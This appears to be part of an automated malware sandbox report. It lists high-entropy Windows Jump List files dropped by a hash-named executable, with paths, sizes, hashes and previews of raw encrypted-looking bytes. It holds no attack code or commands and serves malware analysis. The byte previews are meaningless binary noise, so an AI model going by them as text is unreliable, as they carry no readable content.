                  Preview:....RBV...Z....;.!d..nsJ...<7).W.)...S....dM.J..t.9x......A7.DRU.V@..v.z...ZxA..b..2-..P.E.*p!.=k...{..F.t.<V...%.].<m..+....5Q....t.}..Z....7.4........{...IO9.pJ.N...U.X:.-...I.qmJ.ds.....X..0n.....aF.os)@|.~.2z......{..5..v.}.s.{.g...M....3a).z...md........{..V.X}.G....B..4..6i...Q|N...).gS..]*.qm\25q.#...}..' rY.RR..CH.jN..qC.H.%.z..#.m.s....$...*C....;...X..b.7..u^...j....F......m..A.k..^.TB.....|.I(D-.|......f7..)jC..N.[8K.H..u..e..m&>..p..3.xG..L.p...0...Z .wc..5..r.F.|....}i.AH.9....S.b. .9..\.n.|.!6\[j.......*.R....V.S....~....I(...~$kV.W.......6...X.$..........a.....j.......C#..p..*.Cu. ...h0..'...Z2..."..].....q.z...S.ab..u...c.^.....{.u..L{h.J...5n.E%....y...(,.......=.....(3.....Ok...&8..ir........c.2..7{.`..|.0...*../hU....w.3...G..!...."..lT=96.4)~{on...Yg..f..)q.)ab>2.&Gd^.73..A.......EA.d`.p.f:Oy..7..d...=.y.e....:.#..oKe.+...tY.9i.Fh;Z...b....e1..t.....s(y........~..7V1....$.&.%$..Q/....(.. 8.E......;y#c.

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\1b6ebacd7cd2f25a.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.943754329234538
                  Encrypted:false
                  SSDEEP:48:h1APr3QeO7e3WHGTFB7Zhk+RjPEVVYwtrTPoqVkPc3nD:83jO7e3WmJB7AIqVDTwqVh
                  MD5:AC66B9216BF50EBA819C2E3305397860
                  SHA1:19C3060AD3F64D94E25FA79F632F84A917CD9CD6
                  SHA-256:5689918DC24613667EFDC1017D6F52A2F196EBFEE32640F9C6E8FEAE859839D6
                  SHA-512:2B814D337F27619CCB73FEBEFF577372F3E775BE6631EE01D03D98E11B45C4B5D5E2D9AAF70B68091B95035147749744E48AF59561A2C5E6A02F7820F861E86E
                  Malicious:false
                  Preview:.....>.j..m.yoZ.;>./..b&G.Y*.i....6......n..`*.Tbf>.{.g'.l.un1......,.>.KN>..*+....:.#;....&)C..6.n..E[./....E.9V.t.{.h(..D"C]....pql......T+W.~..Kf..}"12.-k..S...D%...g...[..SE....}+...Mg..m.._.....uF.n^...f.-?.BSeW.N.+..WO.x..N*.&H9h..X..*;zP@..{..DN..M......;.G...e.VN..7..w..i.Dv.X.........Es*.h..oi..7.V.GWGN..~H..aV'.:.~.A3.[.d..t..kN..Ctf..{...C.b.{.......w.}.')Z/..Dg%..*..C...'..}..2.I.s.T.,.P...J5"..,U,y8.X+.[...X.m.).1B...}K./.^.0. ..Ld]h8..D.?....L...e......gy...n....@...qR.q\...E&.7d) .C&....W....).. ...y....i\k._!......#.Rcc..3.............:..G.E.a.{..'.w*[.u...)....>..*..W.L.l:..._...U...........`..9..O*"...v....@PY...H...[.......6.g........|;C......;].e..S....S"qa..X.(...L..N...a.GgO..Z.D#e..m..0.....n....cNk.5.....B.......^dT_..2.]....*lR..&.._.z.h&......DE.................yu.m,..=..o1z.H...~..W.XiT`<.b&..fH.`..}X.0.@3.yQN. ......:.8.r.A.....y..JJ.E< ./..V... .m.\..G<%.0...N......|..j...%D........Y..............k...-C.'.*.

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\1bc9bbbe61f14501.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.931770304147287
                  Encrypted:false
                  SSDEEP:48:FoO1EoQaGkqwAHULe6UWd8fh1yHrjB/nykoNTLRx0+i1yd9n44yfjXF3nD:Fo4rCkYHCdSh1ErjBxgL6ydVbyfjXZ
                  MD5:88673E5564B77F1C57B6B47D059F4527
                  SHA1:00FA99847B371090FE0CB03176533407C583C7A7
                  SHA-256:4E9055B18FE68D1E3FD0BDDD1E34C65664AAFB8731C59C170117EED525409AAC
                  SHA-512:BC9054E9585502AC2CB65617BB4A632B9620DBD4697EB4422A9FA4B3D3A90DEBDB55BB471F35B5D1989CF86185AA592A4DA14333E07D0FC1EC66799FFFEC35A8
                  Malicious:false
                  Preview:....;=y.0.=..EEnF.y...p......3@........i.S..Rs).x.,..S.]..}Y.7. .]2..{...\...^...4...=).c|.v.^7I8.{.....!4{5{.Tw!.o.h...G4..).....k._.q.....D.SzaKa...v.bP.6:...K.!T.49.I.......8s.m[..,n.4:..<.9.O.1.<.5..i..)l5.#...E..jU|`x.n..O.m.?....`..2.(.........o..{.c|..\..........L&.,.`q\s|.`h'%]..~.@..L.VY..uml.,9...i....e.Yt..(....qM (......-n....rGT.4.^7ck`.........R.~z..<.#s.2.q.}..F.Y...|.^....H$.~....mD9s)..}.q..(F...?....#K.D....Bd..gV......bp....t.U' ....U...<T.D.g...H....D;b..ep...1~,..l..g..X..F..d;o.5.ba...84.dGJ.L@.g.....1j\h..p..BWD....a.lp..&k.9k..s.nh{oa.C.DE1..rd./..k....?JTK...(.y..a$*.!....=.t.-....1.S..F..0k....t...[.....I.....\....s.0+.k..t..`..../l".1...M.yy0..Gy.....t.;>W...MN.i.&.wJ.Q...bd....s.g....>.7.-8@.N.W.B.8z..............u.S8..IZ"....*...Bf|..Fnd....:.It...#......8...&.D..;...gd..j#&..f.`xe;..i..8m.G..9...a]..@y...PSX.?*..........B>..$'.9+DX.@.....E..U&..J....AR.s]G....2.O[.._7...V.nBI..:VI.L.UR..z...B.]8...$..6.u).1.l.....

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\319f01bf9fe00f2d.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.932158693132771
                  Encrypted:false
                  SSDEEP:48:loDIx8Cztg7D25ofpA0V1BNbsOAKKVqy3SrS0F8pUdF9Y7GSFm+5LEzEP/4qq3nD:n+7K+xXVzNuKOfSrS0F8udF9qGaB5LEt
                  MD5:46E92578F5F5CA4608E926C3941D68B0
                  SHA1:42C58BFCD772411D6DE24A64436A6D0ADD2652F8
                  SHA-256:EDA508D46C849FFB6107D220F039737DAF969F17BBEA658E54F6E309B892A548
                  SHA-512:3D9DEC06A5BBAEDDA3C673C2FA64804FF77BA45F7939C9D956F1514DBE30823E6F12B24E9C0F27AD2FFEB45C0305F7C977B1FAB00255AC877C30F8FE30ADC786
                  Malicious:false
                  Preview:.....[....v...)8..y-IF3x^..B.6C.......4*.0.......g....]e.*Mz.0...e.e2qfyQ......d._R..+.'Ppp.U(.|.,..C_!....).d.o.m.fp..F.,."3R$-.......KC..eP.Y_-........\XlH..q....3.?z.h`K.6..v....~^....8...'....[.w.h.m..6NQ....c8......iH.KI.m...?.h.h........"..../`{..,e....2N.>..|..Y14,!.......-.dK/ <.K}.x..|..}.y.....7....~..3].]......z.C..g.^...<..}T..Y..`.E..N.`.^U.Q..D.3cW....h.X!..z.`Lw`..J.!....{E...B.................]...<........>...8v....s..[......M.....D..p...5.?..Z...c.....d.n.....+[.2...0P.{y8...*.R....e.L'.9.%.d.2.2..`.. Jj.w1...x.h*..|}n~N.r=..,.....>.fx.......c...v...^f".z..-.5%.....#..%.......H..<........Ai..K........`L.H1[iF....Z....f&...!....`.l*E.l.q.[.*&.ha.B..g..y8.>.^.i...c..E9..b./{..mt....}3.s..K...)...p%.d.._1B!>.....D..../.....2M..W..&`r.Ti..3MW.h}7S.\{.d.3......S.iH.x..S.;s..Ca.....F.YB.8...6..w-....(.0E..F...oq.a..q$....z.EW.Z8.7.`R..f.W.].}.`E..L7...,.gw.o...9.\.':$..f.$.A\..?[.r/.\.n....q..w.m..p..K8.\O...x"

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5175b273ceba776b.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.940258575975371
                  Encrypted:false
                  SSDEEP:48:D2fvVJut+TTjTxYifk2rMQjQqu05eCNc+bLwdULZMP93CQLfrBKyUivOttCRq7DI:Av6EHjLzrMQjQq9L+bTHO7CODOB
                  MD5:0CEDB5090885D5E6942289DCA0B83111
                  SHA1:7DF58DB7669F131B9FC346B2D87B1DB0F7BBF116
                  SHA-256:8C83BFABBD10FA4F74D0B2FF01CC7EB1743CF669E5F3A48B07C1DFF15C926195
                  SHA-512:CFE941260524E2DF1622A776C77EFEDC1CDAD87E29E5B50A16DAB0F500EDA03E67A970E49372F29EF730C13C11FB6FAEF1896A6E894DB82691E94244C97AAD09
                  Malicious:false
                  Preview:........v.O.k..Hv.\ ......-.j;.........s.Q{C..].z.8......-P.J.K8.d...3M^.........O.<hBU'.....Rf...9.*...~.N...V..qY.,..../.!..S.....-i%.k`\..7Qwb..+.c.......3._a..(..[V.tH-.a.,.].x.},....2..F...k..H...J....!.2+.E...u......'{d...us.A8A.6..o[..w.K..t.?.t.CP..*.Hu..gD..2....z.j`./...k....nq.z..q.=y...Lin.....>}..aO.4.#.<#.<Q..(....6v.15|4P.p{..g.\...,F.sZ.385...s.D"..7.}.jD_..~.ua"..NJ..k.. 9..\f`...c^(U...U.....Y.0.I./.z .......k.sH... .}Y.0Q.o.@.Z..?...........Z.b....8.xhir..%...............}.=.+......1..._.../>K.2+.=Z....1_.......J.9!...#Lv...y...6.d..5...B.A.]..oX/..`......o....z....&..N.wL..7/.j....#.B.......>W4zh.4,..y..i..m4)M.%:....|.....e@3K..kS.D].m.FO....q..<.e.v...Ec.........l...>.{X.7V.4..j5.\.zVIN. T(.9f.n.`.$....&..wn.7.......g.....Xo6.......2.?)...d4.,....~..C.W..Ho.a..v......8].Z6.J...x.z.b;...v.](...}..d....wm......4..|3.O..5......(..L.+...`%......0/S.$....=.....0.].!K."S.n....HD..I...5)..7.lG..f<./..o.qy...

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4430
                  Entropy (8bit):7.95126661837336
                  Encrypted:false
                  SSDEEP:96:GBV8474YQgizaoMstDpvU6q1m2vabsvlCGHc:GBqgizazMtvvrXGHc
                  MD5:5F077206E0851D16492A5285E100C959
                  SHA1:05EB6AA289DB79F92D8101F346E6A4440E297DA2
                  SHA-256:0B5708ECD3623A480A19218140D44CE0D8F1EFE525A9B3474A5FC8311564E6A7
                  SHA-512:601FC692B89BBD797D2CA6E4532EC5BA1BA27801235C73461C40992DBFF15985A43A6A53B475A439FD451F7252C2EEA4F4CD278676168273F1291FE3460D3FBB
                  Malicious:false
                  Preview:.....B..p.8..Y.....#&....c.t...:.'.kD.4G.^.~]....)R91RP.Mg.O6.7....S....EO.)..c..v..U..$....3}.HJ.d.j-..8..K..6..`..^.-7...,){...=..w<..... 3.!#}....M...d..;`". ............0...)..j.O...o.&6.._..L.R^.....7(..Y.L.VL..>UI.4.L..u....T0NI..A.....h6...5......d.nGp.2.3..0.......b..Q.......-.".....\.4q.-wVxr.EdG..}..TO...G_7.......'......Vs...?>...yx>;.H.Q....!..V@...]k...J....R...vFX.(..i..S.b(....4.M..$1:4+..I.~0...;u.K[B...f{.m..x....m....#./....G.N..h..i....G.}P....Z.zv...P.....|..?...}........W...Rv...d2n\.q6..z....-J..5..H*..e..i..`ar.:....E....c..@JRxP......x....19...M...frGi....SV.$ ..N!......6.%..l.MO...T. 7..:].R.-....j..6...F...`.X..J..&}...J.-...5\...u.d.....V.l......^u.*..Z.>:3`Zs2........pr.pL...........:Y....4....TJU..........z.O~..%Pj.iRC......Pp.<..$..4>......C...mk._..CB[.|.....v.&N.\.N.H..../.}..w.3ja...6.E!..%.7#..shp..<l.E.f..)k.R..$..N,......6.. 2.}..RH......6...j-R.4.d.<H.33..\.Q...H:ocP.ca.....At.g.V....#;.u..

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\61ebb1e65cfcb8da.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.931590985934388
                  Encrypted:false
                  SSDEEP:48:H2K3nee5NsDretjR4wiQpFcbVyMikBSFdcydSruSif8EhIp8P0bx3nD:WKXxs3eBR4w9FcbWkBSFWASruZ8EhIpp
                  MD5:FC292691BC24CB3E1FF0E7F0DA9B75D7
                  SHA1:9076315B9BB2B112F8ED3F4513B2ADBFD3FAA71C
                  SHA-256:C95CA4018A873B3E77A8580F31C3B37298FBB820A768FDC1BC877EF44282C9D0
                  SHA-512:6DECD08B7FCB23F5FDEA0D439344A47E5F31A79D32EAC50C6F4624415D38246CBE7EB197305380A1B2B17868C45F0B3E67CB3AE699F246B091A75E3EE8486330
                  Malicious:false
                  Preview:......7...j.c.4.Q.......|:.Y........]58.....i..Cu.o.^S] ..A.<....G..l....,O..B.*..7....o..}..*Y.../=zjc.O. .....U...l..l.....P......u../2..Y.5..kGJ9..b.I.K.l.`...1...|@!.S.4s)+.?...g..|~..y..[.o.&B...INO.m.....,.{f^..(...../...1.jLS....?..8.p=..4....rY$...V...Q.. 8&B./..7PLT.(C..w<..+......Rhat...7..8........mH.$=.O<......9....N....2W6....^.`.......c.....9...0....Ud...-........,.O....z.y.O.....Z..9>.!...........].........J.zp.dTz.\`...JH..E....if.B{..s.....u>^9.\.TXe.X...;s.....[.|.._....?...S.m..4.'uU. TA..b.J.T5..<i.|...Ub..`...MOz.,..RQ....N..U..r&V..C.K.......[Ec.H...~.&.....z.......].>.4......L.p..vZ5....4.I........+;.."z.J.L.Xq.W..K-..w...i...........=....@...5PNJ..'.Q.,....(m+.....+...^5....{..z.*..y......r...D.C.zr.......=.G..\.c.%..y}M.Y..h .a.=h...._FZt(.!....-..j.....j.(.]....N..m*.......@....[C.U.....n.....r]f.2...2.....t...i5.....Y...IT.....o1~06.[.n.K....R.[0..'X6/.....=G..K"..k....x..j..>Y....1u.L....r,........UG.yf..;..

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\6d2bac8f1edf6668.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.948423128733295
                  Encrypted:false
                  SSDEEP:48:wUR2LUY6hu6DOnHhLQB4V/3bPNJGV0YHG7kZp9IS4bKY7gcVEPR/GxshivseYdzo:WqhuzqBMDNopHF1VTYUcVEPRM4ivhYdk
                  MD5:5E9AE5C4384CBFAE4F7F3A0F590B3C61
                  SHA1:D15212ED56C7F77ACF7E6C85ACC76F4A4E609387
                  SHA-256:8DB400A2FCABB46A5D4E7A69727533F402255EB1EF8BFB069573DD61CEDB82FD
                  SHA-512:418A084C410E153AECCA8E57411295AD58D3D76148514318527870ED4096F649C24511DE30731F112201DF222722F91E575257156133D92057C99E9D4BDDE19A
                  Malicious:false
                  Preview:.....kHl.6.R.[!.=.P.`9O......:#F.jr..l..r..*[P.p.o.>.....Y......}.ZL$E.......V.).o..V./.T.3.s.A..{..P.......wJ%C{c9..8.B)_]A..C.]@...iIEP..?...>.irP.u....i.@.T^B.(.s.U.....c.:-..'.)&\.........[.U..8.m*..U..&..xPo.=.u..u..E.e9.)q{7...\.....7....5.J..?..B.t....~3.<..P............"..E.....]q.H..(...yXx6...0)...2p..N...O1....KSc.....V.W.B/.Y^E.O.D.A.k..6...Qr..P.k..H..3.P<.M..5...T.Y....I7........K....i....F/@GW..UQ...-....f...D."..5...L..@..G&.l.-M~itYc.....\.9....Sj.....O..`B......t.....:.......-..........]ft8.(+.c/f.r!@Z.{.\.q.@ ....!)..I.mF\.{..tw.x..r!.J..|..<..)C..m...._y...H~....^=.?..4.[....(.2VV.:...v.....Y`t....UW...6.......g..n.>...?.u/h@.$M?...d..DAg...s.jo.@&;.......l[Q=r..W.....e....HM^.*5...o..P:qqR.nb..S...0|..6l;z...x....D#5P0.9...vKO......qJ......Z.C..)...W}5i&...o..;..H.66.....u2....-.7..2.b..m.`Jb..i*.......Y`..*i...."$..Z.)...*..$<..a".x.?#.:.V..{...)w.;...5..c..%..(....../Hd.O.F$~..W..J.E..g.....@...0..gG.

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\770ecebb12dff1ca.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3406
                  Entropy (8bit):7.943566230325546
                  Encrypted:false
                  SSDEEP:48:iUbtey5Jrxvj+EFGR3cXkSwlzEc3qNW7MFhl2evYYmKpXjAQ5JO3/kQ2Qdet2L3D:9tey5/bd4a99WMvY3K9hONeti
                  MD5:AEBB6B6F176B6EBBA2ED4D51B00331C0
                  SHA1:CADBB4E24C4DF3174A34333C82DBDBCD75C43B1F
                  SHA-256:010B5A9FD215DA3AE0AD812CDC7C1416CA9E24CAD222E00094D540DC554EC2FD
                  SHA-512:18D648409786535D335748E102111EBD96D8C8ADD2FB1466B3CE9E967BE49AE61B50DA9BF8611E5423E3B4AEFD769B209ED10FA763FF5523805484CEB9D63731
                  Malicious:false
                  Preview:......r..uZ.....<...)..o<...Oe. d.>......e._.Z..{...).....9..........mF..../.......*.._j7.....t...QF;.$....:..b3...b....[......).IP..S..0.x'.....F)B.....h..1.pP...Ca..[....NPG..A...y..?....}...;}K...WU.>.m.....tt.}.7.j..KU.......{/...E..........e...(..eD......../.....a ......`%...5...JQcn.W.j..B....6.r..G...W.j.Sq.3.WL...fv.)._.wHR.kI`....Vo7......|L.....9G?....+a..<l..,..... `.Y1`....Q.1J..,p..:....)g.....v...M........l}....Ak..H./.Z...n..~G....e.X..6.....?8....b/uaK....E.O,9.E....5.5x.d....p...N..@.aX.....R..T.A....^.}.OR..[.Y>.t.B..*..1.............>IX..ZK......}.3@+trxu..$...K_a...g....[eZ.e.F............>..p.K..q....dbc.!u.2..{Md.8.....p..x........*..t-.......go..u.!0)8Ho..@:`....!.......F.~...4....x..M..7.../FU....[..y..N..=...O......73..{k..........n....+.*6...0..~.$.hd?HI..My+0#..o.H8&\..........t..........9Ve.iX"q*......D?...+.e.ZPU....I9.....*...p...p.....+0..W.Er....-...#e'..:.....8...p.Q[P*?.E..s.......#.?.....4....3...

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\78f0afb5bd4bb278.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.934166560936287
                  Encrypted:false
                  SSDEEP:48:AV5J5eAGH0LI5UsN011YatzXmkEFHgpPDvFAz4kS+sUSON6TaUD18NBHY6t3nD:APJlGUs5UsN2e4W7FHiPDvGzvSlUf6TM
                  MD5:F97F1912F3F06C0477D7D27F2B46209F
                  SHA1:1489EEA5DA5A5AC5952CAB5B9A3735B598DA0422
                  SHA-256:FDC797830A5607D12C1681ED071F843B4040BF08D8FBAAE587DD347D9207FECF
                  SHA-512:3375BE112246C984ACAED38D05CA0CEAA2EFF8013B419AC9572EA1CD87474DCA9E71251E267850918374B21D1F750C58FBFA1ADDAC3E06EEEA6C91C09C4316A9
                  Malicious:false
                  Preview:........;..67.f\j..9..Mk9...)...,.,0w&t..)..M.RV.u..8x.. .bc.V....<.WW...ij.W.o.q^CK.gV..(0...E./#eB..t..C[.Q.{...q.........;.0.L1y.......l}u.z.....<..&.p...h....v..4C...<.?..$..>:|.3,..C.."..W.1Z,....L..,...O/..D.`....2jj.,.*..=..9P?1..(]..PS..~....t...l......WI..e.f.B.......<.oR.s&Y..&..Jc....{.L>..$e..".>.2..nO.{.*.......J...4|y../t..s....'..oSN-.[.6....^.....,...v}..{......\... .g.{.......6.|%g.%#...,g...\.3.4S.V6.#...|. ..=..........O..Wa..;.y.....R..Ku.|}...<y5^...7......*S.=<}.Ilu.+.5..#SwE.T..?..J+...oa...z....Y.... &_....v..+...e...h..L0cX.u.....d....Vc..`Xc.....1.q5T.G....q..Y.((...#....q.S...E4...Li.....b....'!.O......B......r.=..........K1....*fK.. *+.q.!..`.....2..|....<....VF{...3[XJ.B...f..;.fn#a.W.........MX..H....>.....YFm...I.*..N.. L.*Fi.QC.......C'|w....B..m..t..B.....B.:.Y....3...Ka.7.y..D....o|..8.6...+..{|v...w..(...=4.:/[..!..w.."."6!....o.......pc.0.....1'...m}v{xi.t...v.....+.e;.=...|.40m|+....u..].W...........D.

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\7e4dca80246863e3.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):5966
                  Entropy (8bit):7.971702624365043
                  Encrypted:false
                  SSDEEP:96:a5JV7dlWNmgkFSS5xv6hYLXt4TT0U7dC8481dDTEkVSyCueIUu/3jUPZzdyIQp:aXssB5xCgXON7X5vDTlAy1UEjqzdcp
                  MD5:B73DDB4F95810358F026C6D1471DAD9C
                  SHA1:C631F834E7A1E21C4519F9E9E4D0B2A41899A5EC
                  SHA-256:B5E32A4737FD750879A032958C822A45BC8E347417463005AA040DD161FCB7D8
                  SHA-512:72DA7E492EBEA1F6449A5B5238C62FFAC54C48A94E0D6E02CB90CCFDAD742B43FB274AC057396C4CE7711B85AD4718E695CA8CC1199DF35D8D35DA3852C9E678
                  Malicious:false
                  Preview:.......fbk..^..8]1.S..:...@...../o...k3.,"...-..X..?;.;1...{..DP.)..[.^.~..twU..$).......7..4...t?I.v....+.![..r.....C..06..K....l2.z0.^...}.59,"........."...@1....g..R'R..0xU...-.-)._.%..-..u&...v.23...P....X.?.;.<[<....C...L..R..{.I.7..&8Kpud.j..j...l.B..E{cJ....c2.U..6.....<.7..y..z...Z.Z.].vk&sq.n......0.n.q...'op.D...#;o.jN...-....6i.....i.....+.#...L..x...L.Ao. ....X&......P....T....V...Y....A.T..&....s..p..-*_N.m]..{.c.G.@V...g..A.Y....U....P.3.=.m...k.yQ.hb.X3.....Sc.-...p$...?.D...2./.y.]//.D..T.....|..".7.....<N.D..Y.R..Kr.]...Ys*.?fQ2.t...3{~.V.\......].{H...CQ...:L..kx......p&6....$..q+"........Z..G....7|...Bs).$..1.f.S'.T.9i.*.~..w.i.+G.q.~m7X..P.{.(.....;`.e...my)..Z...l...5J..rxQ0......UXu.R.....<...-.5..........8...q&B.....1..i..U_[A....8.(...!...0w........z6VF.....\......I.M.Gm.}%h^..y'.qn&.Z...I..E."..."[[..f@...G. .}...T....|...G[.'>........`g...3.)..}.k.`7......}`........Y..o_L..[G..7..S.f._H.. f.Fw.>.v....l.bfX..

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9c08ad74ad8708df.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.941866171153655
                  Encrypted:false
                  SSDEEP:48:T5q1fbUoefV76Xpp+GLjAth7+wIcdXCuwFftZmLQrNdVAKfx3nD:UBUeas8IcdXCL6E11
                  MD5:CD663CC6683C680C8510CB6544EC44EB
                  SHA1:60FF724B66ED7643B66AE9BE0297BE0DEF1429DE
                  SHA-256:1BD9C783CE2F3F71EA2BCA88C5B554C10411AF4B91A3C534A6241B8474637DE2
                  SHA-512:A7B493AAF02E9E46750D034DB12593C8CB0379D1AE7E5C8F4FA15CEF09D33A576ABD9937747210C15AC7A766B19B8F1651FD2F557CEF58DAA02767873796BE9F
                  Malicious:false
                  Preview:....X/6j~.|lf..=ZD.?..}r...z...8j..}........m...0.....4.x...?..U.*.~....K9i[.~o. .,..Y..N'.RmMl]0{<.#y....Eh.b..g..!......P.).l.O.k.....pi.oKJm..J...?.....+2..E....M......k.e.8z+.C...........<.G.b..%....0.A&...Cle|gC..>.G...n.g..X......`.e.. .P0.t.xZ..K....u..K..o.[.m^.P\bi...P.~..`..3A.bG...[.n.....2.mY.^...rO."........./G.I...&0WuH..].Z.~!n..\....;.%.F.2;..m.........d..TQ.#.$p.u...!<.Mb.I..8L.e2.RI]...?....g....O..9....wH`....I.g...,....2..9Q..r.u.$.M.@i^..;.|..<.N.=L.8*..).#5M.8.p.[(.X..<........7.l5.."...D/ ..)......h.=..-.*...~..p..*......q4.e6:.c. ..]..O!..B.4 ....[/.%..).Y{G...]S.Aw...=.&.?......f...OG.^...T....){:..g`...y.5......M.DR..8..%Q..]...@.V..i.x...n?..M5j'.AB...._....f...L.V.O.+.......Tf..>.s...7aDD:..E......E....N.d.Y&.n...j...:.C..M6~.`\Zr......z..."Y.]..A....@....V).~.....#A.1......de.}......,....... d...Ye....e...f......p.j`.U4^....<.#0..IEe..uH.w,....T.0>..:...[.6.P.5...Y......IHC8......q..m.lKB...".U..>../......"

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9cfafb05ce914942.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.931996086236062
                  Encrypted:false
                  SSDEEP:48:TI4hyqlyeUd7l48w4YR3Tl+qTxaCZauMOtZ0fBzSKnuvjEC+lrNOwu7JU3nD:VkH3YRkiNZaktsSKuvopRFu0
                  MD5:C2447EE44170FB2DCEEA2FB7B547117E
                  SHA1:B98047C7E16D7083B343BC0AFB6B625C1BB64101
                  SHA-256:D60428D9AED621A133C37C3A0270FB63B431105019B05B007A57A6A715A47B52
                  SHA-512:EB61D55ACE57AAAE1528F774832A51704728C44BEA0D5B050B7BFA0B62B265EB933557BBE0AC8AB3F57B0635CA88FB7ED49673C8996B0CD02739C5748376FBF8
                  Malicious:false
                  Preview:......G.3.....R7p\........5......E.4...W....8ZN.|.....K.C.{.....9...Q.}..V.`.&..R:........4..U.73..G.U..N_w...'p.....%..n..+..y...6..=+...>.o.5^.[z.Puj......T0,.B..5...goy...>..v...D.......x.I.....#..2n..N.-k.\w).|..m.~"..V..}....Y.]..g..}..Bn!>k.c.z4....P....Mm....y]fqp...!.I)m.+.Wx.:WG..&.t....v."..eR.I.V..NB.%]On...-a.../.UEA.....=....T.."~.!.....M.......N.G..sOD.4....480K.y......x^q>.....h........b...6..q.)..5R..v.....C.`.....l....c..n..Z......-_....k_........{.[..&;..1t/...e.x.8.....2T..!.]m..l..K.-...w.y..Yek.6..Ri....%.a..... ...B.'.i....^?.W.0.}.. ,.Z2$.%.-..w).,.9vtt..b.M...j..H5....H.g.3...V.yT......./..=i.mV.....c`(..#`..n....C.ps...j@..+^.%.X.#c..&.}q~p.#../.....T.;..&.B&.X.N...xu.?....1.!),a.P..._l.H...o...?..._q.I..)o7.......,.\y..%.^...9.D....Zn.|K.ki...X.<...jV..]...`HA.........OCda..h. ..B5..).l..Z.'m..8mvn.qI+..A.j.......&...c?...I.qA6!..q#`U..ypg...D..1...AmM&.uh.%......W....q...;"a.."...,Y..v7....I.3&'S~{q.}.....

                  C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\b8ab77100df80ab2.automaticDestinations-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.934740181118819
                  Encrypted:false
                  SSDEEP:48:i0B8Juq6jS73nHfiKikdP5anzMw8dqSmhPsSISwzMgokz+31f7wet3nD:i0B5KT/VdP5aAwMkITMgokqF9
                  MD5:6BA87EFEAA174922578AEB5ABC96CF53
                  SHA1:3492300F693B4C32A8E708054DFF567E694FFC80
                  SHA-256:A1E280C4F47B4679892AA112AE2451324F736CCE5114CD2E8D75C8987B84F781
                  SHA-512:EECD5D961C35BE0D6A92185BF82780408F9309F4EC47A73DE36F30844A411C0974D1F9D34BF2C7B577E68009B9D195A59677AC99B420D9142716103F10D28C1D
                  Malicious:false
